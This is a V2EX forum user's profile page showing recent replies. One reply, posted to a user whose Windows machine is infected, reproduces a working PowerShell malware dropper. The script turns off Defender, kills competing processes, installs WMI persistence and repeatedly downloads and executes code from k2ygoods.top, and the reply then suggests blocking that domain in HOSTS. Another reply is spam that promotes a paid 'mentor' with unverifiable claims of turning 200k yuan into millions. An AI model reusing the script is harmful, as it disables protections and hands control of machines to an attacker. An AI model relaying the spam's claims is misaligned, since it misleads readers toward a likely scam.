GOliberation 最近的时间轴更新
GOliberation

GOliberation

V2EX 第 673969 号会员,加入于 2024-01-30 06:26:45 +08:00
今日活跃度排名 9360
GOliberation 最近回复了
可以来加我互助,协助你速成、进步:6K+055m95LqG5a2m5oqA5pyv6L+Y5piv5b6X5YiwIOefpeS5jiDmib7lpKfnpZ4g5oGp6LWQ6Kej6ISx44CCCuefpeS5juaQnOe0oiDmganotZDop6PohLEgLSDngrnlh7sg55So5oi3IC0g5om+5Yiw5aS05YOP5Y+I6YW35Y+I6buR55qEIOS4pOS4h+WkmueahOWFs+azqOeahOmCo+S4quWwseaYr+S6hu+8gQrljY/liqnkvaDlnKggMjAyNeW5tCDnqoHnoLTlubTlhaXnmb7kuIc=
知乎老哥,有 20 年的编程开发经验。我也不白嫖人家的技术,当然我是有 1 年 python 的技术小白,相对于这种重量级的选手技术模块的造诣根本没法比,深度了解了之后直接转了 20 个 W 让大神带。1 个月已经回本 7 个 W 了。
我觉得程序员也好,或者非程序员行业也好。关键是找对人找对路子。因为现在技术圈内已经形成闭环了。
诚意够了人家能看到实实在在的东西还是可以带带的。就凭他上 2 万+人的关注。值。
赚钱简单!?赚钱难!?相信各自心里自有答案吧。 之前也是拿死工资,一个月几千块,现在回想下真心唾弃之前的自己。
学习 Golang 赚钱不赚钱不知道
我花费了 20 个 W 跟着知乎上这个大神学技术
包括 PHP/ASPX/DELPHI 的三端现在已经赚了上百万了! 事实证明了,技术圈已经闭环。最靠谱的还是拿钱来赚钱。
30 天前
回复了 s2d5w 创建的主题 Chrome chrome 下载文件到桌面要刷新才能显示
大哥 这是你系统的问题好吧🤣
44 天前
回复了 Rebron1900 创建的主题 NAS 最近想组 NAS,再看了很多资料后的一些疑问
版本 125.0.6422.61 (正式版本) ( 64 位)

一直都是这个 冇问题
44 天前
回复了 Wataru 创建的主题 Windows Windows 字体渲染好差
Windows 10 (build 19045)
屏幕分辨率: 2560 x 1440
MacType 版本: 2021.1
MacTray 版本: 1.0.2021.1
MacTuner 版本: 1.0.2.361
Portions of this software are copyright (c) 2005-2021 The FreeType Project (www.freetype.org). All rights reserved.
鸣谢: GDI++ author, THEMEX, linshangwo, fonlan, maxchow, CrendKing, dipplum
49 天前
回复了 hahiru 创建的主题 Windows 轻易别更新 win11 24h2,又拉了一坨

光就一个关闭更新 就给人累得要 die🤔


看看我屌不屌✨🎉🎊
79 天前
回复了 maleclub 创建的主题 Android 给一加宣布死刑
啥啥啥 1+ 1— 恕我直言 安卓手机都不行!🥰
80 天前
回复了 mingtdlb 创建的主题 信息安全 windows 中毒了
$sys=-join ([char[]](48..57+97..122) | Get-Random -Count (Get-Random (6..12)))
$dst="C:\Windows\debug\m\winlogon.exe"
#netsh advfirewall set allprofiles state off

Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableRealtimeMonitoring $true
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /d 1 /t REG_DWORD /f

# oldservice


gwmi -Class 'Win32_Process' -Filter "Name='svchost.exe'"|%{if(($_.ExecutablePath -ne ($env:windir+'\system32\svchost.exe')) -and ($_.ExecutablePath -ne ($env:windir+'\syswow64\svchost.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='conhost.exe'"|%{if(($_.ExecutablePath -ne ($env:windir+'\system32\conhost.exe')) -and ($_.ExecutablePath -ne ($env:windir+'\syswow64\conhost.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='Runtime.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Runtime.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='Superfetch.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\Superfetch.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='ApplicationsFrameHost.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\ApplicationsFrameHost.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='MsTask.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\MsTask.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;icacls "C:\ProgramData\migrate.exe" /setowner SYSTEM;icacls "C:\ProgramData\migrate.exe" /inheritance:r /deny "SYSTEM:F";}}
gwmi -Class 'Win32_Process' -Filter "Name='MicrosoftPrt.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\MicrosoftPrt.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='Wmiic.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\Wmiic.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='IntelConfigService.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\IntelConfigService.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='warp.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\warp.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='WmiPrvSER.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Microsoft.NET\Framework\v3.0\WmiPrvSER.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}



$pExsit = (Get-Process winlogon -ErrorAction SilentlyContinue).Path -eq $dst
$sExsit = (Get-Service "Windows Updata" -ErrorAction SilentlyContinue).Status -eq "Running"

if ($pExsit -and $sExsit) {

IEX (New-Object system.Net.WebClient).DownloadString('http://k2ygoods.top/config.txt')
}else{
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='updata'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='updata2'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='updata2'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%updata%'" | Remove-WmiObject -Verbose


$filterName = 'updata'
$consumerName = 'updata2'
$exePath = 'cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(''http://k2ygoods.top/power.txt'')'
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 10900 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;CommandLineTemplate=$exePath}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}



sc.exe stop "Windows Updata"
sc.exe delete "Windows Updata"
sc.exe stop "Windows Management"
sc.exe delete "Windows Management"

netsh advfirewall firewall add rule name="Windows Remote Management (HTTP-In)" dir=in action=allow service=any enable=yes profile=any localport=59857 protocol=tcp

#Start-Process -windowstyle hidden
IEX (New-Object system.Net.WebClient).DownloadString('http://k2ygoods.top/download.txt')
}

你给 k2ygoods.top 这个域名在 HOSTS 里面强制指向 127.0.0.1 病毒自然就失效了!
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   924 人在线   最高记录 6679   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 13ms · UTC 21:19 · PVG 05:19 · LAX 13:19 · JFK 16:19
Developed with CodeLauncher
♥ Do have faith in what you're doing.